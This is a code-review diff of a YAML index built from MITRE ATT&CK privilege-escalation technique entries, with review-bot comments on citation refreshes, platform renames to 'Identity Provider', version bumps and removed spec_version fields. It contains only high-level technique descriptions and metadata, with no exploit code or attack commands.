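Review bot: the `Microsoft Environment Property` and `Windows NT Command Shell` references in this hunk are only moved, while `Microsoft CreateProcess` and `Microsoft WinExec` are refreshed to learn.microsoft.com with a 2024 retrieval date; the two that were not refreshed still use `docs.microsoft.com/en-us/previous-versions//…?redirectedfrom=MSDN` links (note the doubled slash). Since these entries appear to be copied verbatim from the upstream ATT&CK objects (all the `x_mitre_*` fields come along unchanged), the fix belongs in an upstream citation refresh rather than a hand edit here, but it is worth flagging so the next refresh covers them. The reference reorder from `CreateProcess, Windows NT Command Shell, WinExec, Environment Property` to `Environment Property, CreateProcess, WinExec, Windows NT Command Shell` is pure diff noise, as is the added `revoked: false`.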
@@ -17855,6 +18182,10 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Itamar Mizrahi, Cymptom
+ - Tristan Bennett, Seamless Intelligence
+ x_mitre_deprecated: false
x_mitre_detection: |-
It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
@@ -17866,16 +18197,12 @@ privilege-escalation:
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
x_mitre_version: '1.0'
- x_mitre_contributors:
- - Itamar Mizrahi, Cymptom
- - Tristan Bennett, Seamless Intelligence
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Active Directory: Active Directory Object Creation'
@@ -17911,12 +18238,12 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Harmj0y SeEnableDelegationPrivilege Right
description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
- You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
- url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+ You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- source_name: TechNet Group Policy Basics
description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
Understanding the Structure of a Group Policy Object. Retrieved March 5,
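Review bot: the two harmj0y citations pick up a new host (`blog.harmj0y.net` instead of `www.harmj0y.net/blog`), https, and a retrieval date advanced to September 23, 2024, but the `TechNet Group Policy Basics` reference directly below keeps its 2019 retrieval date and its `blogs.technet.microsoft.com` URL. If this was a link-verification pass, that reference should get the same treatment; if the new URLs simply come from upstream, there is nothing to do here beyond noting the inconsistency.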
@@ -17924,14 +18251,13 @@ privilege-escalation:
url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.001
atomic_tests: []
T1078.001:
technique:
- modified: '2024-03-07T14:27:04.770Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Default Accounts'
description: |-
Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -17946,6 +18272,7 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: Monitor whether default accounts have been activated or logged
into. These audits should also include checks on any appliances and applications
@@ -17954,18 +18281,18 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
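Review bot: `Azure AD`, `Office 365` and `Google Workspace` are replaced by `Office Suite` and `Identity Provider` in `x_mitre_platforms`, with the technique version bumped from 1.3 to 1.4; T1548 and T1548.005 below get the identical substitution. Anything in this repo that selects techniques by the old platform strings (per-platform indexes, filters, test selection) will stop matching these techniques, so the platform-to-index mapping used by the generator needs to know the two new names and decide whether the old ones are retired or aliased to them. Apart from the platform change and the version bump, the `x_mitre_modified_by_ref` insertion here is the same key-order churn seen elsewhere in the diff.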
@@ -17997,9 +18324,6 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.001
atomic_tests: []
T1547.003:
@@ -18071,7 +18395,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.003
atomic_tests: []
T1546.005:
@@ -18098,7 +18421,7 @@ privilege-escalation:
url: https://bash.cyberciti.biz/guide/Trap_statement
description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21,
2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T16:43:02.273Z'
name: 'Event Triggered Execution: Trap'
description: |-
Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap
command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c
and ctrl+d
.
@@ -18124,13 +18447,11 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.005
atomic_tests: []
T1574.006:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:40.146Z'
name: 'Hijack Execution Flow: LD_PRELOAD'
description: "Adversaries may execute their own malicious payloads by hijacking
environment variables the dynamic linker uses to load shared libraries. During
@@ -18251,12 +18572,11 @@ privilege-escalation:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
identifier: T1574.006
atomic_tests: []
T1548:
technique:
- modified: '2024-04-15T20:52:09.908Z'
+ modified: '2024-10-15T15:32:21.811Z'
name: Abuse Elevation Control Mechanism
description: 'Adversaries may circumvent mechanisms designed to control elevate
privileges to gain higher-level permissions. Most modern systems contain native
@@ -18288,11 +18608,10 @@ privilege-escalation:
- Linux
- macOS
- Windows
- - Office 365
- IaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'User Account: User Account Modification'
@@ -18333,11 +18652,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1134.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T21:14:37.714Z'
name: Create Process with Token
description: |-
Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW
and runas
.(Citation: Microsoft RunAs)
@@ -18393,12 +18711,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.002
atomic_tests: []
T1548.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-15T18:43:20.995Z'
name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
description: |-
An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -18455,7 +18772,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.001
atomic_tests: []
T1547.004:
@@ -18525,7 +18841,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.004
atomic_tests: []
T1098.004:
@@ -18635,7 +18950,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.004
atomic_tests: []
T1546.012:
@@ -18689,7 +19003,7 @@ privilege-escalation:
description: Symantec. (2008, June 28). Trojan.Ushedix. Retrieved December
18, 2017.
source_name: Symantec Ushedix June 2008
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.112Z'
name: 'Event Triggered Execution: Image File Execution Options Injection'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe
). (Citation: Microsoft Dev Blog IFEO Mar 2010)
@@ -18722,13 +19036,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.012
atomic_tests: []
T1548.005:
technique:
- modified: '2024-03-28T15:30:09.313Z'
+ modified: '2024-10-15T16:07:49.519Z'
name: Temporary Elevated Cloud Access
description: "Adversaries may abuse permission configurations that allow them
to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -18790,10 +19102,9 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -18851,7 +19162,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.013:
technique:
@@ -18893,7 +19203,7 @@ privilege-escalation:
description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
December 20, 2017.
source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:43:48.848Z'
name: Process Doppelgänging
description: "Adversaries may inject malicious code into process via process
doppelgänging in order to evade process-based defenses as well as possibly
@@ -18952,8 +19262,6 @@ privilege-escalation:
- Administrator
- SYSTEM
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.005:
technique:
@@ -18983,7 +19291,7 @@ privilege-escalation:
description: 'Stefan Kanthak. (2015, December 8). Executable installers are
vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation
of privilege. Retrieved December 4, 2014.'
- modified: '2020-10-27T14:49:39.188Z'
+ modified: '2020-03-26T19:20:23.030Z'
name: Executable Installer File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -19018,12 +19326,10 @@ privilege-escalation:
- Administrator
- User
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.008:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:18.602Z'
name: 'Event Triggered Execution: Accessibility Features'
description: |-
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.
@@ -19100,7 +19406,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.008
atomic_tests: []
T1055.004:
@@ -19139,7 +19444,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:23:46.476Z'
name: 'Process Injection: Asynchronous Procedure Call'
description: "Adversaries may inject malicious code into processes via the asynchronous
procedure call (APC) queue in order to evade process-based defenses as well
@@ -19188,8 +19493,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.004
atomic_tests: []
T1546.009:
@@ -19221,7 +19524,7 @@ privilege-escalation:
description: Microsoft. (2007, October 24). Windows Sysinternals - AppCertDlls.
Retrieved December 18, 2017.
source_name: Sysinternals AppCertDlls Oct 2007
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.052Z'
name: 'Event Triggered Execution: AppCert DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppCert DLLs loaded into processes.
@@ -19269,13 +19572,11 @@ privilege-escalation:
x_mitre_effective_permissions:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.009
atomic_tests: []
T1098.005:
technique:
- modified: '2023-10-03T17:38:39.065Z'
+ modified: '2024-09-25T20:39:53.597Z'
name: Device Registration
description: "Adversaries may register a device to an adversary-controlled account.
Devices may be registered in a multifactor authentication (MFA) system, which
@@ -19288,16 +19589,16 @@ privilege-escalation:
FireEye SolarWinds) In some cases, the MFA self-enrollment process may require
only a username and password to enroll the account's first device or to enroll
a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n\nSimilarly,
- an adversary with existing access to a network may register a device to Azure
- AD and/or its device management system, Microsoft Intune, in order to access
+ an adversary with existing access to a network may register a device to Entra
+ ID and/or its device management system, Microsoft Intune, in order to access
sensitive data or resources while bypassing conditional access policies.(Citation:
AADInternals - Device Registration)(Citation: AADInternals - Conditional Access
- Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Azure AD may
+ Bypass)(Citation: Microsoft DEV-0537) \n\nDevices registered in Entra ID may
be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)
campaigns via intra-organizational emails, which are less likely to be treated
as suspicious by the email client.(Citation: Microsoft - Device Registration)
Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)
- on an Azure AD tenant by registering a large number of devices.(Citation:
+ on an Entra ID tenant by registering a large number of devices.(Citation:
AADInternals - BPRT)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -19309,16 +19610,16 @@ privilege-escalation:
- Mike Moran
- Joe Gumke, U.S. Bank
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Azure AD
- Windows
- - SaaS
- x_mitre_version: '1.2'
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Active Directory: Active Directory Object Creation'
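Review bot: T1098.005 drops `SaaS` outright here and gains only `Identity Provider`; unlike the T1078.001, T1548 and T1548.005 platform changes above, this is a narrowing rather than a rename (`Azure AD` to `Identity Provider`, `SaaS` gone, `Windows` kept). If a SaaS-scoped index or filter exists, this technique will vanish from it, which is expected if the upstream scoping changed but deserves a mention in the PR description so nobody treats it as a generator bug. The added contributor line and the 1.2 to 1.3 version bump are consistent with the `Azure AD` to `Entra ID` wording change in the hunk above.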
@@ -19373,7 +19674,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.002:
technique:
@@ -19396,7 +19696,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:21:11.178Z'
name: 'Process Injection: Portable Executable Injection'
description: "Adversaries may inject portable executables (PE) into processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -19440,8 +19740,6 @@ privilege-escalation:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.002
atomic_tests: []
T1547.015:
@@ -19518,7 +19816,7 @@ privilege-escalation:
url: https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Articles/LaunchServicesKeys.html#//apple_ref/doc/uid/TP40009250-SW1
description: Apple. (2018, June 4). Launch Services Keys. Retrieved October
5, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T16:36:37.042Z'
name: 'Boot or Logon Autostart Execution: Login Items'
description: |-
Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled
.
@@ -19546,8 +19844,6 @@ privilege-escalation:
- 'File: File Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.015
atomic_tests: []
T1134.001:
@@ -19606,23 +19902,22 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1134.001
atomic_tests: []
T1098.001:
technique:
- modified: '2024-02-28T14:35:00.862Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Credentials'
description: "Adversaries may add adversary-controlled credentials to a cloud
account to maintain persistent access to victim accounts and instances within
the environment.\n\nFor example, adversaries may add credentials for Service
Principals and Applications in addition to existing legitimate credentials
- in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue
- Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include
- both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance)
- With sufficient permissions, there are a variety of ways to add credentials
- including the Azure Portal, Azure command line interface, and Azure or Az
- PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
+ in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation:
+ Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials
+ include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer
+ Guidance) With sufficient permissions, there are a variety of ways to add
+ credentials including the Azure Portal, Azure command line interface, and
+ Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn
infrastructure-as-a-service (IaaS) environments, after gaining access through
[Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries
may generate or import their own SSH keys using either the CreateKeyPair
@@ -19632,11 +19927,15 @@ privilege-escalation:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
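Review bot: the two citations introduced on the `+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)` line must resolve to `external_references` entries whose `source_name` matches exactly; both entries are added in the -19701 hunk of this same object, so the keys resolve, but if either `source_name` is ever renamed the inline `(Citation: ...)` text here needs the same edit.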
@@ -19647,12 +19946,19 @@ privilege-escalation:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
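Review bot: the new app-password paragraph (`+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,` through `Microsoft Entra ID App Passwords)"`) introduces a credential type that bypasses MFA and survives a primary password reset, yet `x_mitre_detection` in the -19661 hunk below still only covers service principal/application modifications and SSH key import APIs. If this file is meant to mirror upstream verbatim that is acceptable, otherwise the detection text should also point at auditing app password registration on user accounts so the two fields do not drift apart.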
@@ -19661,6 +19967,7 @@ privilege-escalation:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
@@ -19669,13 +19976,16 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
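Review bot: the `x_mitre_version` bump `'2.7'` to `'2.8'` together with the two added `Active Directory: Active Directory Object Creation/Modification` data sources deserves a sanity check against the description: the text above only discusses cloud identity providers (Azure / Entra ID, AWS, GCP), while these data-source names refer to Active Directory object events. Confirm this matches the upstream object at version 2.8 rather than a merge from another technique. Replacing `- Azure AD` with `- Identity Provider` in `x_mitre_platforms` is consistent with the wording change to "Entra ID" in the description.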
@@ -19701,10 +20011,18 @@ privilege-escalation:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
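Review bot: the `+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,` entry puts the title first and the author (`Lacework Labs.`) after the date, whereas every other entry in this list follows `Author. (date). Title. Retrieved ...` (compare `Ian Ahl. (2023, September 20). LUCR-3: ...` a few lines below). Suggest `Lacework Labs. (2024, June 6). Detecting AI resource-hijacking with Composite Alerts. Retrieved July 1, 2024.` unless the file must match upstream byte for byte.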
@@ -19713,10 +20031,20 @@ privilege-escalation:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -19733,9 +20061,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests: []
T1134.003:
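Review bot: `- spec_version: '2.1'` is dropped here and from every other technique object in this patch with no replacement, while `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` are only relocated (re-added after `kill_chain_phases` and `x_mitre_is_subtechnique` in the -19632 and -19669 hunks of this object). If any consumer treats these objects as STIX 2.1 SDOs, `spec_version` is a required common property there, so confirm the removal is intentional across the whole index and call it out in the commit message.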
@@ -19799,7 +20124,6 @@ privilege-escalation:
